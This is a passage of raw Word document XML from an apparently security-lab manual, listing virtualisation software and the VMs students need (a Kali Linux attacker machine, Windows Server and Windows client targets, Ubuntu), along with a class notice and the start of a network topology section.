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CZt9mimgIAACcIAAAOAAAAAAAAAAAAAAAAADoCAABkcnMv&#10;ZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQCpyOtCSQkAAEkJAAAUAAAAAAAAAAAAAAAAAAAFAABk&#10;cnMvbWVkaWEvaW1hZ2UxLnBuZ1BLAQItABQABgAIAAAAIQD3o+FJ3gAAAAgBAAAPAAAAAAAAAAAA&#10;AAAAAHsOAABkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAqiYOvrwAAAAhAQAAGQAAAAAA&#10;AAAAAAAAAACGDwAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAAB5EAAA&#10;AAA=&#10;">
                <v:shape id="Picture 40" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:3877;top:20;width:413;height:3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VRJwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPGFvNnVxRapRVBD0sot/en80z7bYvJQk2vrtNwsLHoeZ+Q2zXPemEU9yvrasYJKkIIgL&#10;q2suFVwv+/EchA/IGhvLpOBFHtar4WCJmbYdn+h5DqWIEPYZKqhCaDMpfVGRQZ/Yljh6N+sMhihd&#10;KbXDLsJNIz/TdCYN1hwXKmxpV1FxPz+Mgv3PaZqX3+7Q6f5S58f5dbt73JX6GPWbBYhAfXiH/9sH&#10;reBrCn9f4g+Qq18AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAkHFUScMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId21" o:title=""/>
                </v:shape>
                <v:shape id="Picture 39" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:4357;top:20;width:413;height:3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HSwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Ba82XRFRapRXEFwLy7+6f3RPNti81KSaOu33wgLHoeZ+Q2zXPemEQ9yvras4CtJQRAX&#10;VtdcKricd6M5CB+QNTaWScGTPKxXH4MlZtp2fKTHKZQiQthnqKAKoc2k9EVFBn1iW+LoXa0zGKJ0&#10;pdQOuwg3jRyn6UwarDkuVNjStqLidrobBbvf4yQvD27f6f5c5z/zy/f2flNq+NlvFiAC9eEd/m/v&#10;tYLpFF5f4g+Qqz8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA/z3x0sMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId21" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15732736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DC99F0A" wp14:editId="3AE747EE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3105150</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13511</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="262254" cy="250824"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7" name="image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9.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="262254" cy="250824"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>Takeaway</w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD6E1B8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019E21AB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A7E5E16" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:spacing w:before="93" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="839" w:right="1435"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Maintenance (Manual) is now available to all students of this class to refer, add your experience and share your reflections. DON’T FORGET TO ADD YOUR NAME IN YOUR POST. Each poster will be awarded with for their work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEC37FA" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:spacing w:before="202"/>
        <w:ind w:left="839"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Link is shared in our Teams Channel!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2C49D3" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4718F746" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9895"/>
        </w:tabs>
        <w:ind w:left="840"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D3072E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="123"/>
        <w:ind w:left="840"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>You could use any of the following as per your convenience. Highlighted is used here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C745E0" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D09E3C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52532103" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="41"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VMware Workstation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A26594A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="41"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VMware Fusion Pro (for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mac),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C46A0" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VMware ESXi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6E1A53" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hyper-V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF4D6D1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E1E2B8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="9895"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="840"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>need?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C3A209" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="118"/>
        <w:ind w:right="1436"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Virtual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Machines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Attacker)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2012,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Windows Server 2016, Ubuntu, Windows 10, Windows 8, Windows 7 (Optional), Windows XP (Optional).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242BEA0B" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:spacing w:before="121"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Internet access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BE795E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:headerReference w:type="default" r:id="rId22"/>
          <w:footerReference w:type="default" r:id="rId23"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:pgNumType w:start="2"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D42EF06" w14:textId="79CE5802" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:spacing w:before="82"/>
        <w:ind w:left="3304" w:right="1444" w:hanging="2446"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15735296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55BF54B2" wp14:editId="7B2C9EA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="52" name="Line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6A818AE" id="Line 37" o:spid="_x0000_s1026" style="position:absolute;z-index:157352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uLfzAEAAIQDAAAOAAAAZHJzL2Uyb0RvYy54bWysU02P0zAQvSPxHyzfadqglCVquoeW5VKg&#10;0i4/YGo7iYXjsTxuk/57bPeDBW6IHCyPZ+bNmzeT1eM0GHZSnjTahi9mc86UFSi17Rr+/eXp3QNn&#10;FMBKMGhVw8+K+OP67ZvV6GpVYo9GKs8iiKV6dA3vQ3B1UZDo1QA0Q6dsdLboBwjR9F0hPYwRfTBF&#10;OZ8vixG9dB6FIoqv24uTrzN+2yoRvrUtqcBMwyO3kE+fz0M6i/UK6s6D67W40oB/YDGAtrHoHWoL&#10;AdjR67+gBi08ErZhJnAosG21ULmH2M1i/kc3zz04lXuJ4pC7y0T/D1Z8Pe0907LhVcmZhSHOaKet&#10;Yu8/JG1GR3UM2di9T92JyT67HYofxCxuerCdyhxfzi7mLVJG8VtKMsjFCofxC8oYA8eAWaip9UOC&#10;jBKwKc/jfJ+HmgIT8XH5sFyWVcWZuPkKqG+JzlP4rHBg6dJwE0lnYDjtKCQiUN9CUh2LT9qYPG5j&#10;2djwj1VZ5QRCo2VypjDy3WFjPDtBWpj85a6i53VYQt4C9Ze47LqsksejlblKr0B+ut4DaHO5R1bG&#10;XlVKwlwkPqA87/1NvTjqTP+6lmmXXts5+9fPs/4JAAD//wMAUEsDBBQABgAIAAAAIQCvCSOl3wAA&#10;AA4BAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8MwDIXvSPyHyEhcpi3pKiZamk4I6I0LA7Rr1pi2&#10;onG6JtsKvx7vgODmZz89f69YT64XRxxD50lDslAgkGpvO2o0vL1W81sQIRqypveEGr4wwLq8vChM&#10;bv2JXvC4iY3gEAq50dDGOORShrpFZ8LCD0h8+/CjM5Hl2Eg7mhOHu14ulVpJZzriD60Z8KHF+nNz&#10;cBpC9Y776ntWz9Q2bTwu94/PT0br66vp/g5ExCn+meGMz+hQMtPOH8gG0bNWWcpWHm7SJANxtiSZ&#10;WoHY/e5kWcj/NcofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJoK4t/MAQAAhAMAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAK8JI6XfAAAADgEA&#10;AA8AAAAAAAAAAAAAAAAAJgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAyBQAAAAA=&#10;">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>The configurations/ ip addressing below listed is based on this topology. Make</w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>necessary changes as you work on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD8BE41" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15078DDF" w14:textId="6C77245A" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
